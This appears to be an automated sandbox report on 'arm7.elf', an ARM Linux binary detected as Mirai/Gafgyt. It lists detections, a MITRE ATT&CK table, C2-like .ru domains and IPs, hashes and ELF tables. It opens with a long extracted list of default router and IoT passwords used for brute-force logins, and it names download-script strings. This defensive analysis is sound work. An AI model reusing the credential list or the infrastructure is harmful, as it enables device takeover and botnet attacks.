dslolitecip3000calvincat1029comcomcom!roothunt5759extendnetfliradminusuariogvt12345supervisorzyad1234qrstklv123davoxzsun1188xad#12bayandsl3wareradius3UJUh2VemEfUtetoorbintecUq-4GIt3Mwysecoolphoenix579nE7jA%5mmicrobusinessPASSWORDmeinsmcms500adslnadamgiraff666666zoomadslsuperadminIs@dminikwbalpineasantepuconexantaquariotinitsunamivertex25ektks123inflectionip20anicuscADMINpermitpldtadminonexantdvr2580222Win1doW$true5432112341234JVC3500/24sitecom46ironport88888888uClinuxvolition2800tslinuxsecurityatlantis888888nCwMnJVGagbaby00000000openelec1111111kont2004rpitc123123696969362729atc456hp.comcycl3R0cks!letacla000000nosoup4u11111111Gin51mvf3mg3500merlin99999999admin1anni201322222mlusrlogin3333333adminpldtbbsd-clientchangeme2support123aerohiveadmin00vmware123utstartl789l3tm31nseiko2005tivonpw,ba23422222222admintrupt1789admdarkcusadminhighspeedascendMenarasysAdmin33333oracleanicust3333wbox123attackAscendAitbISP4eCiGadmin@mymifi2222222dPZb4GJTu9ROOMeins1988321piloucomcastsetupZmqVfoSIP333333michelangeloCOadmin123Zntslqblendervt100admin_1pfsensehellotest1my_DEMARCjvswitchezdvr7ujMko0root/ADMIN/adminlvjhadminlvjh1232010vstaxmhdpicruntop10qwertyQwestM0demqweasdzxguest123h2014071TANDBERGWprootarkeiachangemenowf00b@rarticawww9311supersurtiwkbadmintesthuigu309UsernetscreenpitaZz@23495859Root1password123fidel123annie2016asdfghdottietwe8ehomebatman123hackedwelcomeyellowD13hh[china123p@ssw0rdjordanhackmewagodasdec1patrickgforgeEminemspidermansparkypassword1shadowgatewaydiamondprincessflowerch
Source: arm7.elf, 6231.1.00007ffee2d65000.00007ffee2d86000.rw-.sdmp, arm7.elf, 6235.1.00007ffee2d65000.00007ffee2d86000.rw-.sdmp, arm7.elf, 6239.1.00007ffee2d65000.00007ffee2d86000.rw-.sdmp	Binary or memory string: x86_64/usr/bin/qemu-arm/tmp/arm7.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/arm7.elf

Stealing of Sensitive Information

Yara detected Mirai

Source: Yara match	File source: arm7.elf, type: SAMPLE
Source: Yara match	File source: 6235.1.00007f80e0017000.00007f80e0034000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6231.1.00007f80e0017000.00007f80e0034000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6239.1.00007f80e0017000.00007f80e0034000.r-x.sdmp, type: MEMORY

Remote Access Functionality

Yara detected Mirai

Source: Yara match	File source: arm7.elf, type: SAMPLE
Source: Yara match	File source: 6235.1.00007f80e0017000.00007f80e0034000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6231.1.00007f80e0017000.00007f80e0034000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6239.1.00007f80e0017000.00007f80e0034000.r-x.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	Windows Management Instrumentation	1 Scripting	Path Interception	1 Masquerading	1 Brute Force	11 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	1 Service Stop
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 File Deletion	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	2 Application Layer Protocol	Traffic Duplication	Data Destruction

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
arm7.elf	51%	Virustotal		Browse
arm7.elf	47%	ReversingLabs	Linux.Backdoor.Gafgyt
arm7.elf	100%	Avira	EXP/ELF.Mirai.W

Name	IP	Active	Malicious	Reputation
cat-are-here.ru	185.93.89.106	true	false	high
cuttiecats.ru	185.93.89.106	true	true	unknown
newkittler.ru	185.93.89.106	true	false	high
cats-master.ru	185.93.89.106	true	false	high
qittler.ru. [malformed]	unknown	unknown	false	high
gokittler.ru. [malformed]	unknown	unknown	true	unknown
cuttiecats.ru. [malformed]	unknown	unknown	true	unknown
polizei.su. [malformed]	unknown	unknown	true	unknown
kittlez.ru. [malformed]	unknown	unknown	true	unknown
thekittler.ru. [malformed]	unknown	unknown	true	unknown
kittlerer.ru. [malformed]	unknown	unknown	true	unknown
newkittler.ru. [malformed]	unknown	unknown	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http:///wget.sh	arm7.elf	false		high
http:///curl.sh	arm7.elf	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
200.245.85.164	unknown	Brazil	4230	CLAROSABR	false
12.131.90.186	unknown	United States	17225	ATT-CERFNET-BLOCKUS	false
40.246.66.16	unknown	United States	4249	LILLY-ASUS	false
171.151.82.107	unknown	United States	9874	STARHUB-MOBILEStarHubLtdSG	false
27.177.40.86	unknown	Korea Republic of	9644	SKTELECOM-NET-ASSKTelecomKR	false
191.109.3.38	unknown	Colombia	3816	COLOMBIATELECOMUNICACIONESSAESPCO	false
156.16.86.150	unknown	unknown	29975	VODACOM-ZA	false
166.145.68.246	unknown	United States	22394	CELLCOUS	false
46.72.228.131	unknown	Russian Federation	12714	TI-ASMoscowRussiaRU	false
75.96.15.150	unknown	United States	7922	COMCAST-7922US	false
86.189.147.166	unknown	United Kingdom	2856	BT-UK-ASBTnetUKRegionalnetworkGB	false
160.147.126.49	unknown	United States	1503	DNIC-AS-01503US	false
63.226.193.164	unknown	United States	209	CENTURYLINK-US-LEGACY-QWESTUS	false
56.172.19.240	unknown	United States	2686	ATGS-MMD-ASUS	false
113.79.1.69	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
217.197.179.51	unknown	Hungary	20845	DIGICABLEHU	false
176.228.79.79	unknown	Israel	12400	PARTNER-ASIL	false
91.189.91.43	unknown	United Kingdom	41231	CANONICAL-ASGB	false
91.189.91.42	unknown	United Kingdom	41231	CANONICAL-ASGB	false
109.176.168.142	unknown	United Kingdom	12513	ECLIPSEGB	false
28.43.233.53	unknown	United States	7922	COMCAST-7922US	false
185.93.89.106	cat-are-here.ru	United Kingdom	200861	TS-EMEA-ASNGB	false
72.249.97.86	unknown	United States	36024	AS-TIERP-36024US	false
211.166.29.100	unknown	China	9389	UNSPECIFIEDBEIJINGSHENZHOUGREATWALLCOMMUNICATIONCN	false
121.221.108.176	unknown	Australia	1221	ASN-TELSTRATelstraCorporationLtdAU	false
207.245.241.43	unknown	Canada	15290	ALLST-15290CA	false
159.34.99.239	unknown	United Kingdom	25019	SAUDINETSTC-ASSA	false
130.86.120.166	unknown	United States	396465	SACSTATEUS	false
210.200.91.135	unknown	Taiwan; Republic of China (ROC)	131142	APOL-AS-TWAsiaPacificOn-LineServiceIncTW	false
109.202.202.202	unknown	Switzerland	13030	INIT7CH	false
116.96.132.130	unknown	Viet Nam	7552	VIETEL-AS-APViettelGroupVN	false
2.217.1.188	unknown	United Kingdom	5607	BSKYB-BROADBAND-ASGB	false
121.206.29.3	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
24.183.191.62	unknown	United States	20115	CHARTER-20115US	false
222.243.39.250	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
40.104.12.84	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
42.1.143.224	unknown	China	4249	LILLY-ASUS	false
96.22.11.211	unknown	Canada	5769	VIDEOTRONCA	false
105.247.74.38	unknown	South Africa	36994	Vodacom-VBZA	false
115.157.78.166	unknown	China	4538	ERX-CERNET-BKBChinaEducationandResearchNetworkCenter	false
39.18.30.246	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.93.89.106	dlr.arm7.elf	Get hash	malicious	Mirai	Browse	/arm7
91.189.91.43	dlr.arm7.elf	Get hash	malicious	Mirai	Browse
	dlr.arm5.elf	Get hash	malicious	Unknown	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	klfarm.elf	Get hash	malicious	Unknown	Browse
	kflarm7.elf	Get hash	malicious	Unknown	Browse
	bot.arm5.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse
	bot.x86_64.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse
	.Smpsl.elf	Get hash	malicious	Unknown	Browse
	.Sm68k.elf	Get hash	malicious	Unknown	Browse
91.189.91.42	dlr.arm7.elf	Get hash	malicious	Mirai	Browse
	dlr.arm5.elf	Get hash	malicious	Unknown	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	klfarm.elf	Get hash	malicious	Unknown	Browse
	kflarm7.elf	Get hash	malicious	Unknown	Browse
	bot.arm5.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse
	bot.x86_64.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse
	.Smpsl.elf	Get hash	malicious	Unknown	Browse
	.Sm68k.elf	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
cats-master.ru	rep.ppc.elf	Get hash	malicious	Unknown	Browse	156.229.232.99
cats-master.ru	arm4.elf	Get hash	malicious	Unknown	Browse	156.229.232.99
cat-are-here.ru	mips.elf	Get hash	malicious	Unknown	Browse	156.229.232.99
newkittler.ru	rep.m68k.elf	Get hash	malicious	Unknown	Browse	156.229.232.99
newkittler.ru	rep.ppc.elf	Get hash	malicious	Unknown	Browse	156.229.232.99
cuttiecats.ru	rep.arm5.elf	Get hash	malicious	Unknown	Browse	156.229.232.99

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
STARHUB-MOBILEStarHubLtdSG	mips.elf	Get hash	malicious	Mirai, Moobot	Browse	171.182.176.248
	sora.spc.elf	Get hash	malicious	Mirai	Browse	171.158.49.112
	Hgf.x86_64.elf	Get hash	malicious	Mirai	Browse	171.181.237.75
	res.arm5.elf	Get hash	malicious	Unknown	Browse	171.145.133.39
	z0r0.sh4.elf	Get hash	malicious	Mirai	Browse	171.32.213.151
	telnet.mips.elf	Get hash	malicious	Gafgyt, Mirai	Browse	171.183.88.252
	botx.spc.elf	Get hash	malicious	Mirai	Browse	171.147.196.222
	botx.sh4.elf	Get hash	malicious	Mirai	Browse	171.188.126.84
	botx.mips.elf	Get hash	malicious	Mirai	Browse	171.188.163.34
	botx.arm6.elf	Get hash	malicious	Mirai	Browse	171.154.172.66
CLAROSABR	botnet.arm5.elf	Get hash	malicious	Mirai, Moobot	Browse	189.7.169.2
	botnet.mpsl.elf	Get hash	malicious	Mirai, Moobot	Browse	187.23.108.123
	botnet.mips.elf	Get hash	malicious	Mirai, Moobot	Browse	189.103.80.27
	botnet.spc.elf	Get hash	malicious	Mirai, Moobot	Browse	201.31.38.58
	debug.dbg.elf	Get hash	malicious	Mirai, Moobot	Browse	177.65.207.108
	spc.elf	Get hash	malicious	Mirai, Moobot	Browse	200.243.56.54
	sora.m68k.elf	Get hash	malicious	Mirai	Browse	191.181.205.154
	sora.sh4.elf	Get hash	malicious	Mirai	Browse	191.188.217.106
	Hgf.m68k.elf	Get hash	malicious	Mirai	Browse	187.23.126.50
	Hgf.x86_64.elf	Get hash	malicious	Mirai	Browse	201.17.94.159
LILLY-ASUS	https://doxnero.sg-azure.top/	Get hash	malicious	Unknown	Browse	43.159.99.102
	https://doxnero.sg-azure.top/	Get hash	malicious	Unknown	Browse	43.159.98.10
	https://doxnero.sg-azure.top/	Get hash	malicious	HTMLPhisher	Browse	43.159.99.102
	https://us-west-2.protection.sophos.com/?d=powerbi.com&u=aHR0cHM6Ly9hcHAucG93ZXJiaS5jb20vdmlldz9yPWV5SnJJam9pWWpBNU5UZGtPVEl0T1RVNVpDMDBNVEl3TFRrNFpqVXROR1U1T0dWaU5XVTVNRE01SWl3aWRDSTZJakUxTVdNeE5qWmxMV00zWldFdE5HSTFaQzFoTWpRM0xUTmtNVEF5TlRFelkySXdNeUo5&i=NjAzNTFlYmUxMmQ2N2MzMjNhNzYzZDg0&t=cXRBVTE0Z3RLSGRTdEd4cm1WNzFhUm4wLzUzdXZKYklHYmduYnhYNlpsVT0=&h=5e715a0526a946bcaa614abc851141f0&s=AVNPUEhUT0NFTkNSWVBUSVYXtWfTC_gnxLfx0tqsdWatsuMxIHchoBDvy0tVrFrMxg	Get hash	malicious	Unknown	Browse	43.152.64.207
	botnet.arm.elf	Get hash	malicious	Mirai, Moobot	Browse	43.35.74.140
	botnet.sh4.elf	Get hash	malicious	Mirai, Moobot	Browse	40.211.111.68
	botnet.mpsl.elf	Get hash	malicious	Mirai, Moobot	Browse	43.80.224.103
	.Sarm5.elf	Get hash	malicious	Mirai	Browse	40.22.159.71
	botnet.mips.elf	Get hash	malicious	Mirai, Moobot	Browse	40.229.74.144
	botnet.spc.elf	Get hash	malicious	Mirai, Moobot	Browse	43.76.176.180
ATT-CERFNET-BLOCKUS	res.spc.elf	Get hash	malicious	Unknown	Browse	12.129.153.251
	botx.arm6.elf	Get hash	malicious	Mirai	Browse	12.109.90.1
	Fantazy.spc.elf	Get hash	malicious	Unknown	Browse	12.67.80.136
	arm7.elf	Get hash	malicious	Mirai, Moobot	Browse	206.17.108.54
	armv7l.elf	Get hash	malicious	Unknown	Browse	135.14.28.13
	mpsl.elf	Get hash	malicious	Mirai	Browse	12.131.249.160
	fuckunix.spc.elf	Get hash	malicious	Mirai	Browse	63.240.110.142
	db0fa4b8db0333367e9bda3ab68b8042.i686.elf	Get hash	malicious	Mirai, Gafgyt	Browse	134.24.206.83
	armv7l.elf	Get hash	malicious	Unknown	Browse	32.67.63.79
	arm7.elf	Get hash	malicious	Mirai	Browse	32.228.133.111

File type:	ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, with debug_info, not stripped
Entropy (8bit):	6.083867152487808
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	arm7.elf
File size:	178'356 bytes
MD5:	5a468969618a24b7a5f80ce520b59a62
SHA1:	28c46b16fe3b87b590407e0dd4d35df59c673423
SHA256:	97a1a2fb6691566e43950717ad5aa4459231c8a5f9fd53298064080b24ecd1ea
SHA512:	0eb129bf4d3660e21b109c517f155091eb912ddc026ed62903df9094e7b67eac13ac69593da154cd0d63a88da9e7fdfeb78c0d6e6c1ba27b13719f05db6c16d2
SSDEEP:	3072:QN/L/JXJQawBiRCKf2ehJ7QZpaHZooHAnbW7ubgOKMifvvEUiM/9kE7da0Y:QN/1XJQuflhJ7apaHZooHAbpOvvE9M/A
TLSH:	27042A4AEA818E63C4D7177EBA9F425D333297E093DB7306C8187BB43F4266A0D67605
File Content Preview:	.ELF..............(.........4....5......4. ...(........p.....I...I..................................................................h....A..........................................Q.td..................................-...L..................@-.,@...0....S

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, little endian
Version:	1 (current)
Machine:	ARM
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x8194
Flags:	0x4000002
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	5
Section Header Offset:	144768
Section Header Size:	40
Number of Section Headers:	29
Header String Table Index:	26

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Link	Info	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0	0	0
.init	PROGBITS	0x80d4	0xd4	0x10	0x0	0x6	AX	0	0	4
.text	PROGBITS	0x80f0	0xf0	0x19800	0x0	0x6	AX	0	0	16
.fini	PROGBITS	0x218f0	0x198f0	0x10	0x0	0x6	AX	0	0	4
.rodata	PROGBITS	0x21900	0x19900	0x3088	0x0	0x2	A	0	0	8
.ARM.extab	PROGBITS	0x24988	0x1c988	0x18	0x0	0x2	A	0	0	4
.ARM.exidx	ARM_EXIDX	0x249a0	0x1c9a0	0x118	0x0	0x82	AL	2	0	4
.eh_frame	PROGBITS	0x2cab8	0x1cab8	0x4	0x0	0x3	WA	0	0	4
.tbss	NOBITS	0x2cabc	0x1cabc	0x8	0x0	0x403	WAT	0	0	4
.init_array	INIT_ARRAY	0x2cabc	0x1cabc	0x4	0x0	0x3	WA	0	0	4
.fini_array	FINI_ARRAY	0x2cac0	0x1cac0	0x4	0x0	0x3	WA	0	0	4
.jcr	PROGBITS	0x2cac4	0x1cac4	0x4	0x0	0x3	WA	0	0	4
.got	PROGBITS	0x2cac8	0x1cac8	0xa8	0x4	0x3	WA	0	0	4
.data	PROGBITS	0x2cb70	0x1cb70	0x1b0	0x0	0x3	WA	0	0	4
.bss	NOBITS	0x2cd20	0x1cd20	0x3f88	0x0	0x3	WA	0	0	4
.comment	PROGBITS	0x0	0x1cd20	0xbd4	0x0	0x0		0	0	1
.debug_aranges	PROGBITS	0x0	0x1d8f8	0x140	0x0	0x0		0	0	8
.debug_pubnames	PROGBITS	0x0	0x1da38	0x213	0x0	0x0		0	0	1
.debug_info	PROGBITS	0x0	0x1dc4b	0x2043	0x0	0x0		0	0	1
.debug_abbrev	PROGBITS	0x0	0x1fc8e	0x6e2	0x0	0x0		0	0	1
.debug_line	PROGBITS	0x0	0x20370	0xe76	0x0	0x0		0	0	1
.debug_frame	PROGBITS	0x0	0x211e8	0x2b8	0x0	0x0		0	0	4
.debug_str	PROGBITS	0x0	0x214a0	0x8ca	0x1	0x30	MS	0	0	1
.debug_loc	PROGBITS	0x0	0x21d6a	0x118f	0x0	0x0		0	0	1
.debug_ranges	PROGBITS	0x0	0x22ef9	0x558	0x0	0x0		0	0	1
.ARM.attributes	ARM_ATTRIBUTES	0x0	0x23451	0x16	0x0	0x0		0	0	1
.shstrtab	STRTAB	0x0	0x23467	0x117	0x0	0x0		0	0	1
.symtab	SYMTAB	0x0	0x23a08	0x5450	0x10	0x0		28	783	4
.strtab	STRTAB	0x0	0x28e58	0x2a5c	0x0	0x0		0	0	1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
EXIDX	0x1c9a0	0x249a0	0x249a0	0x118	0x118	4.5219	0x4	R	0x4	.ARM.exidx
LOAD	0x0	0x8000	0x8000	0x1cab8	0x1cab8	6.2338	0x5	R E	0x8000	.init .text .fini .rodata .ARM.extab .ARM.exidx
LOAD	0x1cab8	0x2cab8	0x2cab8	0x268	0x41f0	2.9733	0x6	RW	0x8000	.eh_frame .tbss .init_array .fini_array .jcr .got .data .bss
TLS	0x1cabc	0x2cabc	0x2cabc	0x0	0x8	0.0000	0x4	R	0x4	.tbss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x7	RWE	0x4

Symbols

Name	Section Name	Value	Size	Symbol Type	Symbol Bind	Symbol Visibility	Ndx
	.symtab	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
	.symtab	0x80d4	0	SECTION	<unknown>	DEFAULT	1
	.symtab	0x80f0	0	SECTION	<unknown>	DEFAULT	2
	.symtab	0x218f0	0	SECTION	<unknown>	DEFAULT	3
	.symtab	0x21900	0	SECTION	<unknown>	DEFAULT	4
	.symtab	0x24988	0	SECTION	<unknown>	DEFAULT	5
	.symtab	0x249a0	0	SECTION	<unknown>	DEFAULT	6
	.symtab	0x2cab8	0	SECTION	<unknown>	DEFAULT	7
	.symtab	0x2cabc	0	SECTION	<unknown>	DEFAULT	8
	.symtab	0x2cabc	0	SECTION	<unknown>	DEFAULT	9
	.symtab	0x2cac0	0	SECTION	<unknown>	DEFAULT	10
	.symtab	0x2cac4	0	SECTION	<unknown>	DEFAULT	11
	.symtab	0x2cac8	0	SECTION	<unknown>	DEFAULT	12
	.symtab	0x2cb70	0	SECTION	<unknown>	DEFAULT	13
	.symtab	0x2cd20	0	SECTION	<unknown>	DEFAULT	14
	.symtab	0x0	0	SECTION	<unknown>	DEFAULT	15
	.symtab	0x0	0	SECTION	<unknown>	DEFAULT	16
	.symtab	0x0	0	SECTION	<unknown>	DEFAULT	17
	.symtab	0x0	0	SECTION	<unknown>	DEFAULT	18
	.symtab	0x0	0	SECTION	<unknown>	DEFAULT	19
	.symtab	0x0	0	SECTION	<unknown>	DEFAULT	20
	.symtab	0x0	0	SECTION	<unknown>	DEFAULT	21
	.symtab	0x0	0	SECTION	<unknown>	DEFAULT	22
	.symtab	0x0	0	SECTION	<unknown>	DEFAULT	23
	.symtab	0x0	0	SECTION	<unknown>	DEFAULT	24
	.symtab	0x0	0	SECTION	<unknown>	DEFAULT	25
$a	.symtab	0x80d4	0	NOTYPE	<unknown>	DEFAULT	1
$a	.symtab	0x218f0	0	NOTYPE	<unknown>	DEFAULT	3
$a	.symtab	0x80e0	0	NOTYPE	<unknown>	DEFAULT	1
$a	.symtab	0x218fc	0	NOTYPE	<unknown>	DEFAULT	3
$a	.symtab	0x80f0	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x8134	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x8194	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x81d0	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x82cc	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x8424	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x8640	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x86ac	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x871c	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x8b50	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x91e4	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x9800	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x9aa0	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0xa254	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0xa94c	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0xaff8	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0xb354	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0xbbd8	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0xc3ec	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0xc618	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0xc8b8	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0xccf4	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0xd1e0	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0xd230	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0xd2d4	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0xd9c0	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0xd9f4	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0xda44	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0xda78	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0xdaa0	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0xdae0	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0xdb2c	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0xdb78	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0xdbf8	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0xdc20	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0xdc84	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0xdcfc	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0xde50	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0xdef8	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0xe05c	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0xe848	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0xe8b8	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0xe924	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0xe9b4	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0xeae8	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0xebbc	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0xebe4	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0xec2c	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0xf114	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0xf218	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0xf30c	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0xf510	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0xf614	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0xf964	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0xfbc8	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x11158	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x13580	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x13b60	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x14c90	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x14cc0	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x14e7c	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x15080	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x15584	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x155ac	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x155f4	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x15618	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x1563c	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x15698	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x1572c	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x157bc	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x158b8	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x159f4	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x15b08	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x15b1c	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x15bb4	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x15ca8	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x15ce0	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x15cf4	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x15dd4	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x15e0c	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x15e4c	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x15eac	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x15ef0	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x15f30	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x15f68	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x15fac	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x16030	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x16070	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x160fc	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x1612c	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x1623c	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x1630c	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x163d0	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x16480	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x16568	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x16614	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x1661c	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x1663c	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x16670	0	NOTYPE	<unknown>	DEFAULT	2
